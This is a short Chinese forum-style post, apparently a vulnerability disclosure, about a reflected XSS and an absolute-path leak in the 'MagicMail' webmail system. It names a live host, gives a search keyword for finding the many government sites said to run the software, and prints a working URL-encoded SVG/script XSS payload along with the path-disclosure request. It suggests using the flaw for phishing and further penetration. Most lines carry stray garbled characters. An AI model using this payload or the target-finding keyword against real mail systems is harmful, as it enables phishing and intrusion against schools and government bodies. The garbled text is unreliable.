今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞) j* t9 ^8 U' a5 x" @: G! l
' D2 X* M7 K' T6 s; o
4 C1 y) F ]- J包含 一个反射性XSS 以及 绝对路径泄漏
7 O, X; r4 o' E- S, G5 H( t看了看 貌似全部是linux的。
- N& R6 R( ~1 T# {3 t
) b6 t; O: G+ ~7 b) H关键字:迈捷邮件系统 by MagicMail: P6 X. w( l/ b
5 Z% D/ O8 f& k j' A. f
可以看到很多政府网站都用这个邮件系统
4 Y8 ^4 u7 M, b- s+ n! V3 E3 w+ ]) j# R4 U" p" {( W
绝对路径 http://madman.in/index.php?login_type=declare&language=
3 }% m" p$ y9 I2 w$ D- C- a/ I: T# S( L" p# B
6 G, \6 ? v5 I+ \; X
7 {7 U/ q6 i, tXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
& J0 `" S9 J1 Y+ q; ~2 g8 I5 P) _! c0 m3 p
( ?0 c! v0 M/ g* _% R, T
1 H, D8 x6 q2 L+ {6 W& J% h虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等
! |2 X' u% ~$ C 4 I$ W& b$ Y4 M% o
修复方案:看官方补丁吧。' ~: m5 `7 l) x0 h5 X
|